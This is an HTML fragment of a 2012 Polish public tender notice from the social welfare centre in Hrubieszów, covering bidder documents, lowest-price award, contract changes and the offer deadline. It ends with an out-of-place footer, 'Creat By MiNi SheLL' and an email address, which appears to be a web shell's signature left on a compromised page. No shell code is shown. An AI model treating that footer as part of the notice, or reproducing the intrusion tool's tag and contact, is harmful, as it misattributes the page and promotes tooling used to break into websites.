<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza zmianę postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy wyłącznie w sytuacji gdy wprowadzenie tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawierania umowy lub zmiany te są nieistotne albo korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.projekt-lepszezycie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Hrubieszowie
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 12  /I piętro/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 14:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Hrubieszowie
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 6 sekretariat /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com